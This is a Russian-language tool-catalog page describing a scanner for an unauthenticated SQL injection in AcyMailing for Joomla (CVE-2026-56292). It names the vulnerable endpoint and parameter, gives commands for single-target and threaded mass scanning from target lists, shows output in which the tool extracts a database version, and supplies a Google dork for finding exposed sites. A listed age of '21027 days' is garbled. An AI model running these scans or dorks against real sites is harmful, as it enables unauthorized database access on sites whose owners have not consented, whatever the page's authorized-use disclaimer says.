Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-56292-AcyMailing-SQLi — CVE-2026-56292 - Сканер неаутентифицированных SQL-инъекций в AcyMailing для Joomla | Kitploit
Инструменты/GitHubGitHub/nullwhisper/cve-2026-56292-acymailing-sqli
Сканеры уязвимостейСканеры веб-уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubnullwhisper/cve-2026-56292-acymailing-sqli

CVE-2026-56292-AcyMailing-SQLi

CVE-2026-56292 - Сканер неаутентифицированных SQL-инъекций в AcyMailing для Joomla

Репозиторий
21027 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-56292 — Неаутентифицированная SQL-инъекция в AcyMailing для Joomla

Автор: nullwhisper
Только для авторизованных исследований безопасности / проверки уязвимостей.

AcyMailing для Joomla предоставляет публичную front-end задачу frontentityselect::loadEntityFront. В старых версиях параметр columns передаётся напрямую в SQL-запрос без санитизации. В исправленных версиях используется acym_secureDBColumn() и возвращается ошибка вида ... not secured.

  • CVE: CVE-2026-56292
  • Продукт: AcyMailing для Joomla
  • Конечная точка: index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFront
  • Параметр: columns
  • Тип: Неаутентифицированная SQL-инъекция

Файлы

root@kitploit:~
.
├── cve_2026_56292_acymailing_sqli.py   # single + mass scanner
├── dorks.txt                             # google dorks
├── TECHNICAL.md                          # technical write-up
├── requirements.txt
├── LICENSE
└── README.md

Установка

root@kitploit:~
pip3 install -r requirements.txt

Использование

Одиночная цель:

root@kitploit:~
python3 cve_2026_56292_acymailing_sqli.py -u http://target/

Массовое сканирование:

root@kitploit:~
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt

Опции:

root@kitploit:~
-u URL          single target
-l LIST         target list file
-t TIMEOUT      request timeout (default 30)
-T THREADS      concurrent threads (default 10)
-o OUTPUT       output file for vulnerable targets
-v              verbose
--proxy PROXY   http/https proxy
--patched-output FILE
--error-output FILE

Проверено на localhost

Протестировано на установке AcyMailing v11.0.3 в локальной лаборатории Joomla 5 (режим симуляции уязвимости).

root@kitploit:~
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204

[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1

Google Dorks

Смотрите dorks.txt. Основной дорк:

root@kitploit:~
inurl:"index.php?option=com_acym"

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследований. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Автор (nullwhisper) не несёт ответственности за неправомерное использование или ущерб, причинённый данным кодом.

Лицензия

MIT — см. LICENSE.

Скачать инструмент